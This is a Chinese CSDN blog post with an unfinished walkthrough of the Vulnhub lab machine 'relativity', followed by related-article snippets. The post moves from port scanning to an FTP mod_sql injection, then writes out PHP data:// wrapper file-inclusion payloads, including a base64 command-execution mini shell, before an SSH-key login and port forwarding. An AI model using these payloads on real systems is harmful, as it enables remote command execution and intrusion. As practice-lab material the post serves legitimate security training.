relativity (v1.0.1)靶机

最新推荐文章于 2022-10-28 09:59:49 发布
最新推荐文章于 2022-10-28 09:59:49 发布
阅读量202 收藏
点赞数
分类专栏: 靶机 文章标签: 信息安全 ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/118025900
版权

relativity (v1.0.1)靶机

arp-scan -l 扫描靶机IP地址

nmap -sV -Pn -A x.x.x.242 nmap 查看开放的端口

访问80端口

dirb 进行扫描,无果

FTP登录试试

使用anonymous登录失败,不过我注意到一个banner

220 Welcome to Relativity FTP (mod_sql)

google一下,找到一个SQL注入漏洞,EXP在这里

在浏览器打开这个目录

查看页面源代码,好像有文件包含漏洞

我尝试了一些本地文件包含,但它没有让我任何地方。为了进入下一步,我需要一些外部阅读和灵感。对于漏洞利用,我们可以利用PHP的流包装器:PHP附带了许多用于各种URL样式协议的内置包装器,用于文件系统函数,如fopen(),copy(),file_exists()和filesize(),这里面有篇文章的攻击应用

# simple RFI
page=data://text/plain, <?php system("whoami");?>

# base64 encoded RFI
page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ3aG9hbWkiKTs/Pg==

# mini shell
page=data://text/plain,<?php system($_GET[cmd]);?>&cmd=id

# base64 + URL encoded mini shell (didn't work without URL encoding)
page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B&cmd=id

执行成功

查看passwd文件

mauk目录有个.SSH文件夹

进入可以看到有个公钥和私钥

私钥,使用私钥登录mauk账号

找到/opt下有个东西

查看端口开放情况

本地开放了6667端口

IRC(Internet Relay Chat的缩写,“因特网中继聊天”)是一种透过网络的即时聊天方式。其主要用于群体聊天,但同样也可以用于个人对个人的聊天。IRC使用的服务器端口有6667(明文传输,如irc://irc.freenode.net)、6697(SSL加密传输,如ircs://irc.freenode.net:6697)等。

靶机上面没有nc命令,不能做端口转发,那就用SSH做端口转发

kali扫描本地4444端口

 

之后就不会了,请求大佬指导。

xzhome
关注
专栏目录
jerome-v1.0.1 靶机
dyx0910的博客
05-23 249
jerome-v1.0.1 靶机
vulnhub靶机--6Day_Lab-v1.0.1
Tauil的博客
08-01 290
修改src值,查看apache默认配置文件,发现网站端口是在8080,但是只接受本地连接,因为在80端口输入的信息都被IPS拦截,所以我们可以通过该出漏洞访问8080端口针对checkpromo.php的promocode值进行SQL注入。双击进入数据包,发现不论将src修改为何值都没有有效输出但是也没有错误显示或者拦截,打开burpsuite进行抓包,尝试重新发送,将src修改为index.php,回显了初始页面,说明该处存在目录路径漏洞。但是没有回显内容,尝试进行反弹shell,在原终端输入。.....
靶机渗透】w1r3s.v1.0.1靶机渗透练习
serendipity1130的博客
08-30 635
靶机描述:您受雇在W1R3S.inc个人服务器上进行渗透测试并报告所有结果。他们要求您获得root访问权限并找到标志(位于/root目录中) 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.142 2.扫描端口 nmap 192.168.225.142 -sV -sC -Pn -n -v -T5 -p- 3.使用gobuster扫到后台路径: gobuster dir -u http://192.168.225.154/ -w /usr/share/wordl.
vulnhub靶场,West-Wild-v1.1
kukudeshuo的博客
07-19 543
vulnhub靶场,West-Wild-v1.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/westwild-11,338/ 攻击机:kali(192.168.58.130) 靶机:West-Wild-v1.1(192.168.58.158) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.158 使用nmap扫
靶机渗透练习89-IA:Nemesis (1.0.1)
hirak0的博客
05-01 3547
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-nemesis-101,582/ Description Difficulty: Intermediate to Hard Goal: Get the root shell and read all the 3 flags. Information: You need some good encryption and programming skills to root this box. Please solve t
general relativity
11-06
wald的广义相对论教材,英文版的,书是影印的,不是特别清晰,不影响使用。
relativity
01-19
“Relativity”一词在物理学中特指爱因斯坦提出的相对论理论,它包括两个主要部分:狭义相对论(Special Relativity)与广义相对论(General Relativity)。狭义相对论主要探讨在没有重力作用时物理定律的形式;而...
Perceptual relativity-based local hyperplane classification
02-21
感知相对性基局部超平面分类(Perceptual relativity-based local hyperplane classification),简称为局部超平面距离最近邻分类(HKNN),通过构建输入空间中的非线性决策边界来最大化局部边界,其变化取决于局部...
Relativity_GPS
12-05
We need general relativity to understand extreme astrophysical realms. But the theory also turns out to be essential for the many mundane activities that nowadays rely on the precision of the GPS
relativity-templates:相对事件处理程序,自定义页面和代理的模板
05-04
相对模板 相对模板与Visual Studio 2017和2019兼容,并且包含以下内容: 代理模板 自定义页面模板 自定义页面MVC 5模板 自定义页面Web表单模板 事件处理程序模板 控制台事件处理程序模板 列表页面互动事件处理程序...
FTP命令具体解释(含操作实例)
weixin_33859504的博客
05-09 499
以下是微软命令行FTPclient命令大全。假设你想使用“未加工(RAW)”FTP命令而非以下翻译过的请參考:http://www.nsftools.com/tips/RawFTP.htm   操作实例环境: 主机(FTPclient):192.168.65.1  window 7  64bit 远程FTPserver:192.168.65.131   redhat 5   vsf...
FTP连接虚拟主机响应220 Welcome to www.net.cn FTP service. (解决的一个问题)
weixin_30399055的博客
03-27 1350
问题场景: 使用FTP客户端连接虚拟主机时,同样的账号密码在有的网络下可以连接成功,有的网络下却一直连接不上:ftp响应“220 Welcome to www.net.cn FTP service.”。一开始我一直以为是网络的问题,期间也有换过ftp软件,却一直不行,今天终于发现是FTP客户端在执行AUTH TLS命令后,才提示 无法连接到服务器 的错误信息,查了一些资料发现,这是由于目前虚拟主...
GoldenEye-v1靶场
qq_35355737的博客
06-05 1846
GoldenEye-v1靶场
OSCP - vulnhub BILLY MADISON: 1.1 靶机测试
m0_55751267的博客
08-12 1138
BILLY MADISON: 1.1 靶机测试
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 3240
一次打靶记录。
靶机:Quaoar
AzVoidSUN的博客
06-23 784
运行环境 本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运 行。 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 本靶机的渗透目标为渗透进靶机,找到flag,并拿到root权限。 开始 首先查看本机ip 192.168.1.25 nmap扫一下网段 发现主机 访问下80端口 扫描下目录 发现后台登陆的地方 弱口令admin登陆成功 点击修改404界面 我直接把php反弹she
CyberSploit:1
最新发布
小小猪的博客
10-28 1636
上传linpeas.sh进行漏洞发现,linpeas.sh自行在github上面下载。登录ssh,密码是flag1,查看到flag2。nmap扫描服务以及端口,发现80和22。扫描目录,发现robots.txt文件。进行解密,得到flag2。进行base64解密。得到第三个flag3。
Insanity:1靶机
小小猪的博客
09-29 1390
发现目录下面存在一个火狐的密码缓存文件,将他下载到本地,并下载工具进行破解。发现电子邮件里面会显示,电子邮件系统账号密码一样。登录增加服务器的系统,密码123456。arp-scan探测靶机IP地址。切换到root用户,发现flag。查看mysql.user密码。访问news目录发现用户名。nmap探测端口和服务。增加一台不可用的服务器。直接注入语句,查看数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值